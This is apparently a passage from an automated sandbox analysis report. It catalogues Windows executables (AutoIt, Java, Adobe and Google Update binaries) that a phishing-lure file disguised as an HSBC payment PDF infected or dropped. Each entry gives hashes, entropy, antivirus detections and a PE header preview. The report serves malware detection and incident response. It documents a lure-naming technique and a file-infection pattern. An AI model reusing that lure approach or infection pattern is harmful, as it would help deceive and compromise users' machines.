                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@.............................0............ .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...`..........................@...................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2203136
                                                                                                                                                                              Entropy (8bit):7.642493741465371
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:NK0eqkSR7Xgo4TiRPnLWvJpLNiXicJFFRGNzj3:NK0pR7Xn4TiRCvJp7wRGpj3
                                                                                                                                                                              MD5:9FE5EF1D640F7A7F375A585E86DED930
                                                                                                                                                                              SHA1:575EFBD757A75C529D0C7A7963D0897E7223E9C3
                                                                                                                                                                              SHA-256:590D0D1778236C37E37646BDA5158673C282AACF0E20E79660CE1375A6DBDF66
                                                                                                                                                                              SHA-512:7B04A4756999CCE7E93D6E09AF57CE21CA33C17D04171A6A0106A2412758BC17A9E23A5D9A8CFD80BD878C9E32F626739301349AF71B4D1396D0854642ED1585
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@...........................".....Y."..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2369024
                                                                                                                                                                              Entropy (8bit):7.561294403290172
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:rfYP1JsEDkSR7Xgo4TiRPnLWvJpLNiXicJFFRGNzj3:DYPBR7Xn4TiRCvJp7wRGpj3
                                                                                                                                                                              MD5:005A7984514B3064CFC667ED1FF7F46C
                                                                                                                                                                              SHA1:6083663C8B262CB5BBBE9AFA47B2A52C277FA399
                                                                                                                                                                              SHA-256:493D765648D814DF97E4556C2E377B7B05AEBDA6B86693A88C236074182B57D8
                                                                                                                                                                              SHA-512:2F29D329AF7838E37EA29EC48972FD7998D94D6BA17BB8D4CFA8CEBFEBB86655ECFBAF94361DF020504BBF47FEB6315BD3F21EDCFB30CC5DC10672DAD43F79AC
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.......$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1400832
                                                                                                                                                                              Entropy (8bit):4.6512382171115005
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:kYUcknT/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kZcknTLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:A41D2B72B5BF0B64B1F4360F9097C445
                                                                                                                                                                              SHA1:B5A54819A5E4B0954D8234BA8901FA423A61544F
                                                                                                                                                                              SHA-256:97A078A0CE2F44103F1EEFF8E3A11C5CCB5ED44E54E14FCF3EBF87254797ED10
                                                                                                                                                                              SHA-512:193B93A10233148202CFE24C5AF7612E94B6431027555B6BAFBC811A1CF0C108BF83996BDBA86B2F03E151B92772E82B864D34F3F3DDA677EE28526C54952486
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................P .....T........................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...p..........................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1640448
                                                                                                                                                                              Entropy (8bit):7.1594749367024235
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:u56AqSPyC+NltpScpzbtvpJoMQSq/jrQaSFLNiXicJFFRGNzj3:ZSktbpT7wRGpj3
                                                                                                                                                                              MD5:11E58BD4B3DA477E45FEB2EAD308654F
                                                                                                                                                                              SHA1:306B0E8FCC671501C5458DB8263A20351D4CFA8A
                                                                                                                                                                              SHA-256:CC7F8157789CB4EF4FBE299FFFC5FF78C454912A11B4710D766197BC0EE91B07
                                                                                                                                                                              SHA-512:2816D127E2D1C937512F003DE44DB4CE1592C51B5DCBED7A09B19ADF7624F126BB9F7DE8ACCDE832509A9CCB7A80344E8A0CAAFC0FA403A4CDB218F756840669
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@.......................................... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2953728
                                                                                                                                                                              Entropy (8bit):7.089725551027659
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:lGSXoV72tpV9XE8Wwi1aCvYMdjluS/fYw44RxLqLNiXicJFFRGNzj3:54OEtwiICvYM3fK7wRGpj3
                                                                                                                                                                              MD5:8AD00390CBCF31E4B7B955FB18653A01
                                                                                                                                                                              SHA1:2147858B2922B6C55B7B4E3AA4168BD0E7B97DF4
                                                                                                                                                                              SHA-256:FD2D34B1EDCBD3CE103DF0FF5E8F3D39838F5DF81EBB1B2605D1907052337918
                                                                                                                                                                              SHA-512:DB2277A4A54DC55AC20B8F44E88C1DBDF2D656AA48A6E631660337BD026E46CCE133C2C3BFAA20EB94CD086017BDD2A27A622577C72137D487E0471D3B29BA29
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-......E-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1641472
                                                                                                                                                                              Entropy (8bit):5.075015367587746
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:hAMvR+3kMbVjh9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:mE+lbVjh9LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:38EB34A3EB5C9348F736F4757239BB79
                                                                                                                                                                              SHA1:4E7FA780E8B866F9F09C47ED053225929DDF8C8B
                                                                                                                                                                              SHA-256:D3ED75388C69ECB90B499692161DB94B47E5BC0A112212F591562EAE3129DF8A
                                                                                                                                                                              SHA-512:1B7BBF90910BE8830D5A35DBB3CF2E40AA063A191C05C7A705296EA0C517BDE220FE48BD1981981C456EC42BD7ACBCDFB3F25FE7BCB4D24C384D4E1832475333
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@.......................... $......y.......................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...............<..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1445888
                                                                                                                                                                              Entropy (8bit):4.810142380756184
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:IxGBcmly/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kGy+yLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:9244278F3A4B451378B09E3B314A4B1A
                                                                                                                                                                              SHA1:60559B16AA6408FBE8D3E0AC84796FF494E58E26
                                                                                                                                                                              SHA-256:19D4BDD817AF242D745544406D5C5E92873D67DC5AA1DB43B13AC3E8562FC00E
                                                                                                                                                                              SHA-512:765DAEA6A28C9A10EDC2F6B15749F2174F3EB871DE0C07C1A5422F6FA4F4D909C0DAE4E3A3C93075974946028ECBB9FED72E5337FF8C6D9C8CACE31CE8AED8E7
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@...........................!.............................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...p...........`..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1800192
                                                                                                                                                                              Entropy (8bit):5.302171267223269
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:j0vHyTLj8trn3wsD/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:OWj4rgsDLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:CD9B74EEC4FC6608776A073EC7F86B65
                                                                                                                                                                              SHA1:D5641C7F03BFFFEEAC4155CA9C55C7C95D8063C3
                                                                                                                                                                              SHA-256:849CC9EC8A157FCBD3463CEE83CB16D89846AEA8459588DF3630A5B0F9E66703
                                                                                                                                                                              SHA-512:AEB5A77D77888D0454F65996EF68CAF411897EEC2180FEC6A9B9DD5CAF9BFA5BA7EA28FDD88ED9B28761EBEDDD5F1241E4CE65B452F5AF1B969779AE4384590A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................p&......7......................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1781760
                                                                                                                                                                              Entropy (8bit):7.271319865125773
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:34ijwGJra0uAUfkVy7/ZaLNiXicJFFRGNzj3:3NjwGJrakUQyc7wRGpj3
                                                                                                                                                                              MD5:FEEC30C8FC71F87A2FEB628FB57C4217
                                                                                                                                                                              SHA1:D3158BBAD1B5A5E5347AC979F8648EE962CF6B2E
                                                                                                                                                                              SHA-256:003A8BCE6B408D5CC7A09F9CDF42CA9AEF2160FE220A7E13F5DD0C9FD7ECE163
                                                                                                                                                                              SHA-512:825936EB2C89AC8C2892F57FAC918FBBC2D975FB0B26AEA290ABF0808BC35F3C039F6205FB42A440032BED65E4586BEB68479FB3C4D7F04107DB2CA5A91786CF
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.................................i!..........................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1318400
                                                                                                                                                                              Entropy (8bit):7.438350441649306
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:ReR0gB6axoCxyR6RLQRF/TzJqe58Bim1/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:TgHxWR6uBTzge5Mim1LNiXicJFFRGNzb
                                                                                                                                                                              MD5:927F607B3E77614B66CDF124699E78B1
                                                                                                                                                                              SHA1:0D70EB8822CDDA56F049E9DDEF46A6C9BE2EB91E
                                                                                                                                                                              SHA-256:DBB01A9B9BFBC3B006DE86F7E395F5A7434891F9DB9930440A0E3C765523F0E1
                                                                                                                                                                              SHA-512:F0C7314C2B46A6A481EDBB4B05ACE2BC02832DFDFEA4233B19F88564A9C50F9201A784A0286E7DF8599153351B238F3B8DE8D46055E8E7C3D630872D23C311E1
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`.......D......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1530880
                                                                                                                                                                              Entropy (8bit):4.9949106109873815
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:tpwOtO7z/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:tmOtmzLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:5D7FCABD1C9E9C1E5CEB47853FC67825
                                                                                                                                                                              SHA1:77E821A8E7F095DDFE40A43954E3F7825B8D3209
                                                                                                                                                                              SHA-256:3030C38A2900D43BC3F85E25811EEA8225CB983456E025FC3531CE56FFE5753D
                                                                                                                                                                              SHA-512:4A48C7803AA0C37CF39C78AD23BAC1C0DF10F63DC9E6575300A38B4DF862E987097565DF42FC342D620AE8767ACB78D5D39539C9080EFB7A45716578DA1D95F5
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................P".....I........................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1530880
                                                                                                                                                                              Entropy (8bit):4.99560178821691
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:3KU/h/4KI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3r/VILNiXicJFFRGNzj3
                                                                                                                                                                              MD5:9D13D8C059A1EE862FAE39EC806168BA
                                                                                                                                                                              SHA1:35E0962079F1F9F5DFAC13B7306E731C3F8A6AEF
                                                                                                                                                                              SHA-256:B4CF69DD083FF8B291FAE7701999AC9969C99D6D4171BC212D79888D5B51B62F
                                                                                                                                                                              SHA-512:3AFF71773A001A546A8B05B5CF5E9723F226F80E1855D2B7BED8240651128F647BCF60623BE9ADC7F65BB09AF1E8421E7C2727A2BCC2496764290B6771DA5F46
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................P"......].......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1669632
                                                                                                                                                                              Entropy (8bit):5.069220551824723
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:Kx7YiBLZ05jNTmJWExn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:KxUiHIjNgnLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:78E0F37B74B5A0F5EC7F1563DCB49E13
                                                                                                                                                                              SHA1:03F5CB327A9EB0977E22A2496400F3BAD7E2D875
                                                                                                                                                                              SHA-256:9E305B899ACA3DBC69354351F11607FF00135E65656EFBBBE4AF87746CDF0419
                                                                                                                                                                              SHA-512:CC8615FABD92B35C7E1F344D3A969FFC61C6D704811E9A9744B5C2CE68D469BE7CE8BCF7805D36742E9CDF2478DF60AFB17428B0D4B846527F55DB2C1968B963
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@...........................%......-..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1574912
                                                                                                                                                                              Entropy (8bit):5.027369510370842
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:nlnRkld6fgJcEwix9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:7okfgJcEwC9LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:A91A0EEB84356FBE7DE527F50D0E4FE0
                                                                                                                                                                              SHA1:C1E4C1F8B7956D3EC7B24A232ED59D14E4F84CEA
                                                                                                                                                                              SHA-256:86E48BAE8A914295E28CDB3347C9F8836FC225FE113D18C1B4B600CF1A2BA653
                                                                                                                                                                              SHA-512:53E095BBE54F44F1CE598C33234F3A6D4722362FA8F4EB9BEBD8AF4C25FA4850C94151347F3DC410712282A8BFD30A79972E90DE158791670AAFA0DDA979E20A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@...........................#.............................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...............H..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1677824
                                                                                                                                                                              Entropy (8bit):5.08498493280695
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:FWR5k8hb0Haw+xN/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:FWLk8SHawmNLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:A9DE3699FAA8B137EAE31B8B7C04B91D
                                                                                                                                                                              SHA1:BD577A07ED495C4274E94F542F7AA78FBECD5195
                                                                                                                                                                              SHA-256:0CDDA4DABD00F6675DC9FE1AC5B1D9F4A53E91F502805D27A4FB90F6FE41A8A1
                                                                                                                                                                              SHA-512:85D29AFD92606BAD73AD0BF9760CE5244704D57F303277AB8D70BFEE67DDD593AB61317FD816A13F00E46E9E95B50879AC813DF4F15D92C1D679E40483192E00
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@..............................$........... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...p...`......................@...........................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1437696
                                                                                                                                                                              Entropy (8bit):4.700953920317136
                                                                                                                                                                              Encrypted:false
